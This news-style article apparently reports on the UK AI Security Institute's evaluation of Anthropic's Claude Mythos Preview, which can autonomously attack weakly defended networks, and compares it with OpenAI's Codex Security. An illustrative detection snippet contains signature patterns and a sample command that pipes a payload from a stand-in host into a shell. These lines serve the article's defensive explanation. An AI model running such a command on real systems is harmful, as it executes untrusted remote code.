AI cyber models like Mythos represent a genuine inflection point in how attackers and defenders think about automated network compromise. Anthropic announced Claude Mythos Preview on April 7, 2026, and within weeks the UK’s AI Security Institute (AISI) completed evaluations showing something that should concern every security team: frontier AI can now autonomously execute multi-stage attacks on vulnerable enterprise systems. The twist? These same models could strengthen UK defenses—but only if access is tightly controlled and their capabilities are understood.
Key Takeaways
- Mythos Preview can autonomously attack small, weakly defended networks after gaining initial access
- AISI found Mythos performs multi-step cyber attacks that would take human professionals days to execute
- Mozilla confirmed Mythos discovered 271 bugs in Firefox 150, demonstrating legitimate security research value
- Access to Mythos is restricted to a handful of major tech companies like Microsoft, Apple, and Google
- OpenAI’s rival Codex Security offers lower refusal boundaries and scales to thousands of verified defenders via its Trusted Access for Cyber program
What AI cyber models can actually do now
Two years ago, the best frontier models could barely complete beginner-level cybersecurity tasks. Today, AI cyber models like Mythos execute complex attack chains that previously required experienced human operators. AISI’s evaluation found Mythos capable of discovering and autonomously exploiting vulnerabilities on small, weakly defended systems where network access has already been established. This is not theoretical—it is a measurable capability gap that has closed in roughly 24 months.
The significance lies in speed and scale. A human security researcher might spend days reverse-engineering malware, discovering zero-days, or mapping lateral movement paths. AI cyber models compress that timeline dramatically. Mozilla’s own validation demonstrates the constructive side: Mythos identified 271 bugs in Firefox 150, catching vulnerabilities that human testers and automated tools had missed. The same architecture that finds critical flaws in widely used software can also find them in poorly maintained enterprise networks.
The dual-use problem: why control matters
Here is the catch that keeps UK officials awake at night. AI cyber models are not inherently defensive or offensive—they are tools that amplify capability in whatever direction the operator points them. An attacker with network access to a vulnerable system gains a force multiplier. A defender with access to the same model gains a vulnerability scanner that works at machine speed.
The AISI evaluation deliberately tested Mythos on simplified cyber ranges that lacked active defenders, defensive tooling, and alert penalties for triggering security systems. Real enterprise networks have all three. That AISI had to flag this gap suggests the open question is less whether Mythos could attack a well-defended network than whether the test environment was realistic enough to support firm conclusions. UK ministers have publicly urged businesses to strengthen the basics—patching, access controls, monitoring—precisely because AI cyber models will exploit any weakness they find.
Mythos versus the competition: restricted access versus scaled access
Anthropic has chosen a bottleneck strategy. Mythos access is limited to a handful of major software companies—Microsoft, Apple, Google—meaning the model’s offensive capabilities remain under tight institutional control. OpenAI’s answer is different. Codex Security, positioned as a rival to Mythos, features lower refusal boundaries for cybersecurity tasks and binary reverse engineering for hunting malicious code. More significantly, Codex Security scales through OpenAI’s Trusted Access for Cyber (TAC) program, which extends access to thousands of verified defenders and hundreds of teams.
The strategic tension is obvious. Anthropic restricts access to prevent misuse; OpenAI distributes access to empower defenders. Neither approach eliminates risk. A compromised account at Microsoft is a single point of failure. Thousands of TAC members distributed across enterprises create a larger attack surface but also more eyes and institutional accountability. AISI’s evaluation focused on Mythos, but the institute’s findings apply equally to any frontier AI model with cyber capabilities—including Codex Security.
What UK defenders should do right now
The net-positive framing from UK officials is conditional, not guaranteed. Mythos and similar models become assets only when three conditions hold: restricted access, clear defensive use cases, and honest assessment of what these models can and cannot do. They cannot hack well-defended networks with active monitoring, endpoint detection, and incident response teams. They can and will exploit networks where those defenses are absent or misconfigured.
For UK businesses, the message is blunt. If your enterprise relies on outdated patching practices, weak access controls, or limited monitoring, AI cyber models in the hands of attackers represent an accelerated threat. If you have access to these models through partnerships with major software vendors, you gain a vulnerability discovery engine that works at scale. The difference between risk and benefit is infrastructure maturity, not the model itself.
Will AI cyber models reshape UK cyber defense?
Yes, but not in the way cybersecurity vendors want to sell it. Mythos and Codex Security will not replace human security researchers or mature defensive programs. They will amplify both offensive and defensive capabilities in parallel. The UK’s advantage lies not in restricting AI cyber models—that is impossible and counterproductive—but in ensuring that the organizations with access to them are well-resourced, well-trained, and well-monitored. A frontier model in the hands of a mediocre security team is a liability. The same model in the hands of a mature defender is force multiplication.
Is Mythos available to UK businesses?
Not directly. Mythos access is restricted to a handful of major technology companies like Microsoft, Apple, and Google. UK enterprises can gain access only through partnerships with these vendors or by waiting for Anthropic to expand the program. OpenAI’s Codex Security offers broader access through the Trusted Access for Cyber program, though details on UK-specific enrollment remain limited.
What makes AI cyber models different from traditional security tools?
Traditional security tools follow fixed rules: pattern matching, signature detection, known vulnerability databases. AI cyber models operate autonomously, discovering novel attack paths and zero-day vulnerabilities without explicit instruction. They can chain multiple attack steps together, adapt to obstacles, and learn from each system they encounter. This autonomy is why they are both more valuable for defense and more dangerous if misused.
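To make the contrast concrete, here is a minimal sketch of the fixed-rule approach described above: a scanner that only flags what its predefined signatures already describe. The signature names and patterns are illustrative placeholders, not drawn from any real signature database; anything outside these rules passes unnoticed, which is exactly the limitation autonomous models do not share.

```python
import re

# Hypothetical signatures: a traditional scanner only flags what its
# fixed rules already describe. Names and patterns here are illustrative.
SIGNATURES = {
    "encoded_powershell": re.compile(r"powershell\s+-enc\s+[A-Za-z0-9+/=]+", re.I),
    "download_pipe_to_shell": re.compile(r"(wget|curl)\s+\S+\s*\|\s*(ba)?sh", re.I),
}

def scan_line(line: str) -> list[str]:
    """Return the names of any signatures matching a single log line."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(line)]

if __name__ == "__main__":
    sample = "cmd: curl http://203.0.113.7/payload.sh | sh"
    print(scan_line(sample))  # ['download_pipe_to_shell']
```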
Should UK businesses fear AI cyber models?
Fear is not productive. Understanding is. AI cyber models are coming, whether through Mythos, Codex Security, or future competitors. The risk is real for organizations with weak fundamentals—poor patching, excessive permissions, limited monitoring. The opportunity is equally real for organizations with mature security infrastructure. UK businesses should focus on the basics: keep systems patched, enforce least-privilege access, maintain comprehensive logging, and build incident response capacity. Do those things well, and AI cyber models become a tool for your defenders to find vulnerabilities before attackers do.
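As a rough illustration of what “focus on the basics” can look like in practice, the sketch below checks two of the fundamentals named above: pending patches and overly broad file permissions. It assumes a Debian-style Linux host with apt available; the checks are illustrative proxies, not a substitute for proper patch management or access-control tooling.

```python
#!/usr/bin/env python3
"""Minimal basics audit, assuming a Debian-style Linux host."""
import os
import stat
import subprocess

def pending_updates() -> int:
    # Counts upgradable packages; assumes 'apt list --upgradable' is available.
    out = subprocess.run(["apt", "list", "--upgradable"],
                         capture_output=True, text=True).stdout
    return max(len(out.strip().splitlines()) - 1, 0)  # skip the header line

def world_writable(path: str) -> list[str]:
    # World-writable files are a rough proxy for weak access controls.
    hits = []
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            try:
                if os.stat(full).st_mode & stat.S_IWOTH:
                    hits.append(full)
            except OSError:
                continue
    return hits

if __name__ == "__main__":
    print(f"pending package updates: {pending_updates()}")
    print(f"world-writable files under /etc: {len(world_writable('/etc'))}")
```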
This article was written with AI assistance and editorially reviewed.
Source: TechRadar


